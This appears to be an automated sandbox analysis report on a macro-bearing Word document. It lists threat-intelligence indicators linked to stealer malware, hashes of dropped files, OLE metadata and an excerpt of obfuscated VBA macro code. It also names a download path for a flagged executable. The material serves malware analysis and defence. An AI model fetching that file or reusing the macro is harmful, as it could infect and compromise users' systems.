URL: Screenshot id: 2 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 6 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 4 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 5 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 6 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 2 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: Screenshot id: 4 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 5 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.21.16	file.exe	Get hash	malicious	LummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, Vidar	Browse	tmpfiles.org/dl/15306544/pohtent.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
tmpfiles.org	file.exe	Get hash	malicious	Amadey, HTMLPhisher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	104.21.21.16
	lIocM276SA.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, MicroClip, Stealc	Browse	172.67.195.247
	file.exe	Get hash	malicious	LummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, Vidar	Browse	104.21.21.16
	trSK2fqPeB.exe	Get hash	malicious	Amadey, RedLine, XWorm, Xmrig	Browse	104.21.21.16
	OmnqazpM3P.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse	104.21.21.16
	SecuriteInfo.com.Win32.MalwareX-gen.20001.2923.exe	Get hash	malicious	Unknown	Browse	104.21.21.16
	SecuriteInfo.com.Win32.MalwareX-gen.20001.2923.exe	Get hash	malicious	Unknown	Browse	104.21.21.16
	mlk3kK6uLZ.exe	Get hash	malicious	Amadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, Vidar	Browse	104.21.21.16
bg.microsoft.map.fastly.net	ROtw3Hvdow.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	vfrcxq.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	199.232.210.172
	trwsfg.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	199.232.214.172
	vj0Vxt8xM4.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	Dd5DwDCHJD.exe	Get hash	malicious	Quasar	Browse	199.232.210.172
	rename_me_before.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	199.232.210.172
	2VsJzzWTpA.exe	Get hash	malicious	CobaltStrike	Browse	199.232.214.172
	2VsJzzWTpA.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	YJaaZuNHwI.exe	Get hash	malicious	Quasar	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	web44.mp4.hta	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	qnUFsmyxMm.exe	Get hash	malicious	LummaC	Browse	172.67.219.133
	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	yTcaknrrb8.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	Active_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.198.102
	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	GqjiKlwarV.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	172.67.220.198

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	web44.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.21.16
	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.21.16
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.21.16
	1.ps1	Get hash	malicious	Unknown	Browse	104.21.21.16
	Let's_20Compress.exe	Get hash	malicious	Unknown	Browse	104.21.21.16
	YJaaZuNHwI.exe	Get hash	malicious	Quasar	Browse	104.21.21.16
	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.21.16
	OPRfEWLTto.js	Get hash	malicious	Unknown	Browse	104.21.21.16
	http://4.lkx91.michaelhuegel.com/news?q=IP%20provider%20is%20blacklisted!%20MICROSOFT-CORP-MSN-AS-BLOCK	Get hash	malicious	Unknown	Browse	104.21.21.16

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllul9kLZ:NllUG
MD5:	087D847469EB88D02E57100D76A2E8E4
SHA1:	A2B15CEC90C75870FDAE3FEFD9878DD172319474
SHA-256:	81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
SHA-512:	4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................,..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4klbl1ub.dwx.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4x3yq1xb.l4b.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qipbli5x.oll.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tncimzkk.ehr.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\~DF35B4DC1311DF4CA7.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF3DA8A12EBD5A43AF.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFB8F1A9633CF44C48.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YZ6J21D07WGT9SUPJOMP.temp

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.7101439485149337
Encrypted:	false
SSDEEP:	48:JZAcGo4DC7bU2K+DyukvhkvklCyw/n2egcQHhL7ccSogZou+gcQHhL7ccSogZoq1:p54DCEoXkvhkvCCtFZQBLUHyZQBLUHd
MD5:	DBA08B8A08FFD40D747EE6A858FBB47D
SHA1:	3333C059502411C05D00C848FA786159DDE45AF9
SHA-256:	AC1A19BB17944B7AB5220DE535BCF451C9729D2426F1B42CE7ED68991FF5028B
SHA-512:	187C8D7DBD0A5BA218BBE014FF2318A35DCF6BA6BDBC13B0906F9D7F9E9BA3DFE5FA6A75A2E626D7BD37244B4CFD61922D5B7F929457844DE145B36FE1D8EC62
Malicious:	false
Preview:	...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.......7.i\..J...i\......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl!Z......B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....!Z....Roaming.@......DWSl!Z......C.....................2=..R.o.a.m.i.n.g.....\.1.....!Z....MICROS~1..D......DWSl!Z......D........................M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl!Z......E.....................@.q.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl!Z......G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl!Z......H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.7101439485149337
Encrypted:	false
SSDEEP:	48:JZAcGo4DC7bU2K+DyukvhkvklCyw/n2egcQHhL7ccSogZou+gcQHhL7ccSogZoq1:p54DCEoXkvhkvCCtFZQBLUHyZQBLUHd
MD5:	DBA08B8A08FFD40D747EE6A858FBB47D
SHA1:	3333C059502411C05D00C848FA786159DDE45AF9
SHA-256:	AC1A19BB17944B7AB5220DE535BCF451C9729D2426F1B42CE7ED68991FF5028B
SHA-512:	187C8D7DBD0A5BA218BBE014FF2318A35DCF6BA6BDBC13B0906F9D7F9E9BA3DFE5FA6A75A2E626D7BD37244B4CFD61922D5B7F929457844DE145B36FE1D8EC62
Malicious:	false
Preview:	...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.......7.i\..J...i\......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl!Z......B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....!Z....Roaming.@......DWSl!Z......C.....................2=..R.o.a.m.i.n.g.....\.1.....!Z....MICROS~1..D......DWSl!Z......D........................M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl!Z......E.....................@.q.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl!Z......G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl!Z......H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........

C:\Users\user\Desktop\test.doc.bin.doc (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Tiago Oliveira, Template: Normal, Last Saved By: user, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Feb 28 11:44:00 2023, Last Saved Time/Date: Wed Jan 1 16:20:00 2025, Number of Pages: 1, Number of Words: 0, Number of Characters: 4, Security: 0
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	4.159493815104268
Encrypted:	false
SSDEEP:	192:wPJozXWIAlLZEvA+6/6rNavrgYjk+4bWlUupxXJj+sustjSrRYrYol7GbILlKjO0:wPqXWIs8iSwvxjk+tUnFstVfDLl8OZ+
MD5:	16536F5B47BE48B7BFFAA20252126CC8
SHA1:	FEFEB6FBB66D9E3C187E62C06020010C58DABB3F
SHA-256:	765D27D8AA2DAA8021CD8453F66FCB0A2221C57CF08718326EA919DCF55A56E8
SHA-512:	66E081736ABF39186507D0783851F36EA3F1E34DE8C3C7BFDE0113B441965DC946A4AAAC9F53070B14BB0F156D014EA81282D4C0F09AE623E32DD717FEF0A481
Malicious:	true
Preview:	......................>.......................'...........)...............&......................................................................................................................................................................................................................................................................................................................................................................................................................................................Q.. ..........................bjbj0.0...........................R.eiR.ei..................................................................................F.......F...........................................................................................................]...t...................................................................7...................................................$...............R.........................................................................

C:\Users\user\Desktop\~$st.doc.bin.doc

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.800700173358352
Encrypted:	false
SSDEEP:	3:klt+llltOQ153Stn/ldWlX5lQltMn:7txCtn+qltM
MD5:	EB37E5435E2121DEF4F927D817480496
SHA1:	D985434D5EE9B995274B5CFDDD92FB90584DDADB
SHA-256:	B73035CBABD0D84B03C9E124AFE3A6E65FF0E63D40B3790D365BFF18D9FBB16A
SHA-512:	5395137F2B8F15A23C7442C85B7A5153D7C19AF1B9071DB03107447E0E2331D96BC7B34429600C2FB682775B96B5AD9E11B4317C96754C06C1ACC860C563ED5C
Malicious:	false
Preview:	.user.................................................a.l.f.o.n.s.....5.....E.@O.....7...a.i............................................a.@O."6.}..i......5..=.i

C:\Users\user\Desktop\~WRD0000.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Tiago Oliveira, Template: Normal, Last Saved By: user, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Feb 28 11:44:00 2023, Last Saved Time/Date: Wed Jan 1 16:20:00 2025, Number of Pages: 1, Number of Words: 0, Number of Characters: 4, Security: 0
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	4.159493815104268
Encrypted:	false
SSDEEP:	192:wPJozXWIAlLZEvA+6/6rNavrgYjk+4bWlUupxXJj+sustjSrRYrYol7GbILlKjO0:wPqXWIs8iSwvxjk+tUnFstVfDLl8OZ+
MD5:	16536F5B47BE48B7BFFAA20252126CC8
SHA1:	FEFEB6FBB66D9E3C187E62C06020010C58DABB3F
SHA-256:	765D27D8AA2DAA8021CD8453F66FCB0A2221C57CF08718326EA919DCF55A56E8
SHA-512:	66E081736ABF39186507D0783851F36EA3F1E34DE8C3C7BFDE0113B441965DC946A4AAAC9F53070B14BB0F156D014EA81282D4C0F09AE623E32DD717FEF0A481
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	......................>.......................'...........)...............&......................................................................................................................................................................................................................................................................................................................................................................................................................................................Q.. ..........................bjbj0.0...........................R.eiR.ei..................................................................................F.......F...........................................................................................................]...t...................................................................7...................................................$...............R.........................................................................

C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1200, Author: Tiago Ol, Number of Characters: 0, Create Time/Date: Tue Feb 28 04:44:00 2023, Last Saved By: Tiago Ol, Last Saved Time/Date: Tue Feb 28 05:12:00 2023, Name of Creating Application: Microsoft O, Number of Pages: 1, Revision Number: 4, Security: 0, Template: Normal, Number of Words: 0
Entropy (8bit):	4.396522769462405
TrID:	Microsoft Word document (32009/1) 54.23% Microsoft Word document (old ver.) (19008/1) 32.20% Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:	test.doc.bin.doc
File size:	19'968 bytes
MD5:	0c9f45c5f7ca6b930e912005bdc28e35
SHA1:	e064b2221df8bbb82c17da0d06e8282c513d2eb4
SHA256:	095a8d9dcce2ce35502bfa33f28ac47307c2a2f399b715624f2efae80e8ca520
SHA512:	2d4b82c82c8f0be9f1c4b026f28c3293f60e6976d6cfe508ad9f6d75df706e0d82fca7681dd58feb968632b3f589515db7dd2382f160fd22b6db1c196800e0c8
SSDEEP:	192:PrRYrYol7GbILlKjO0kyYfODmB3w4ppB21ltjOuuuudw83P+f:+fDLl8OZ+ZjtODfe
TLSH:	9292F614FB99D91AF46665B40967C244B738BC9C5911830BB34CFF2CFD30AB44AA4B1E
File Content Preview:	........................!.......................!...........................%..................................................................................................................................................................................

File Icon


Icon Hash:	35e1cc889a8a8599

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "test.doc.bin.doc"

Indicators

Has Summary Info:
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1200
Title:
Subject:
Author:	Tiago Oliveira
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:	Tiago Oliveira
Revion Number:	4
Total Edit Time:	0
Last Printed:	1601-01-01 00:00:00
Create Time:	2023-03-31 04:44:00
Last Saved Time:	2023-03-31 05:12:00
Number of Pages:	1
Number of Words:	0
Number of Characters:	0
Creating Application:	Microsoft Office Word
Security:	0

Document Summary

Document Code Page:	1200
Number of Lines:	0
Number of Paragraphs:	0
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Application Version:	1048576

Streams with VBA

VBA File Name: NewModule.bas, Stream Size: 6796

General
Stream Path:	Macros/VBA/NewModule
VBA File Name:	NewModule.bas
Stream Size:	6796
Data ASCII:	. . . P u b l i c S . u b a w n d j . f a w d w d ( ) . . ' Z f L O x . U A C Z i U y v . f G G C f i h L . h r h w w n J p . p M i L M i Q E . E n Z Z L n n J . E Z k J O L k r . C i r p E i L i . x D A O M f B U . G D Z h f v M k . T M n i i Q Q k . i r v k r J M x y s M U G J k . . g v f ` i G O s s . U A s G x y p B . p v v k h D Z L . B B C C y i C y . w G C E f O w A @ f k C x M r " J . v n E y G J Q A . J k f h y M G y . f y p U A w x D . T n J n L x B r . k G A B r C Q T . E r k A v B s C . U
Data Raw:	01 d8 bc 00 50 75 62 6c 69 63 20 53 00 75 62 20 61 77 6e 64 6a 00 66 61 77 64 77 64 28 29 00 0a 20 27 5a 66 4c 4f 78 00 55 41 43 5a 69 55 79 76 00 66 47 47 43 66 69 68 4c 00 68 72 68 77 77 6e 4a 70 00 70 4d 69 4c 4d 69 51 45 00 45 6e 5a 5a 4c 6e 6e 4a 00 45 5a 6b 4a 4f 4c 6b 72 00 43 69 72 70 45 69 4c 69 00 78 44 41 4f 4d 66 42 55 00 47 44 5a 68 66 76 4d 6b 00 54 4d 6e 69 69 51 51

VBA Code

Public Sub awndjfawdwd()
 'ZfLOxUACZiUyvfGGCfihLhrhwwnJppMiLMiQEEnZZLnnJEZkJOLkrCirpEiLixDAOMfBUGDZhfvMkTMniiQQkirvkrJMxysMUGJk
 'ZfLOgvfxUACZiUyvfGGCfihLhrhwwnJppMiLMiQEEnZZLnnJEZkJOLkrCirpEiLixDAOMfBUGDZhfvMkTMniiQQkirvkrJMxysMUGJk
 'GOssUAsGxypBpvvkhDZLBBCCyiCywGCEfOwAfkCxMrMkTJvnEyGJQAJkfhyMGyfypUAwxDTnJnLxBrkGABrCQTErkAvBsCUxJZOnUCThQJQwkvZpnJGkEkyTrUpphUfxLnTTCLOhZfCATwDxkfnxiGknGrxMsxQZEyOLLhfUOMBGvCMExGLwOLfTUUhknprnDwiMZZEEMLDiJEwZTLTvEMsAkTsDMvinvMECGQpwDJEJUUfTTvfyTUCfhvOGOhErAfskQyTrpEADBCTAkiiEpwZJrGykLxZBfnyLCCrnkpvwvpJxLBBQiMxOZCGDQfsGpDMnhshCTOAMyLZxBAnxvLhfTvnQiknTBOLpALTUOwvnhxrwwxGhhkkJBsZLfGGfAUEvMApyUkDxvJnAZBMfEpGUJwsnMsZZfpGOLUEJAOpBTvxUfOMhhwAQkCUBnsUxnLifEhLDCOExQkwZiysJDrTsnfJvQTkMEGMshUTBJfxUnJQQZDJZ
 t = Timer
    Dim MyRange As Range
        Dim MyCell As Range
    'Save the Workbook before changing cells
          'Copy the data
  
    'Define the target Range.    'Save the Workbook before changing cells
          'Copy the data
    'Selection.FormatConditions(1).StopIfTrue = False
    'Define the target Range.
 
On Error Resume Next
VprcMvTybtWCrceoHvvQyDD.Tables(1).Delete
VprcMvTybtWCrceoHvvQyDD.WFnhePfKQR
WFnhePfKQR.Bookmarks.Add "WFnhePfKQR", VprcMvTybtWCrceoHvvQyDD
'WFnhePfKQR WFnhePfKQR
'MsgBox ("zSG   MwGaJWMtUaonakiksIhs")
'pyYwkPhcRrowVCEdAUrhEsYKBXMQOBcobAaUbkOMGZVdtzZYKZMyN
'GwQkXHAHkyKtCWONPARvkHzfBMpRYOfELQeANpiAciUMwkVfSOztYHiXRppPUJJYofLMRSFFutKbONVQQfYwrNGd
Dim RsoXaQzRZLepceHbdJWVCWvy, wkFG
'vAib
'zSAfQhZXeDrsWescZH
'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG
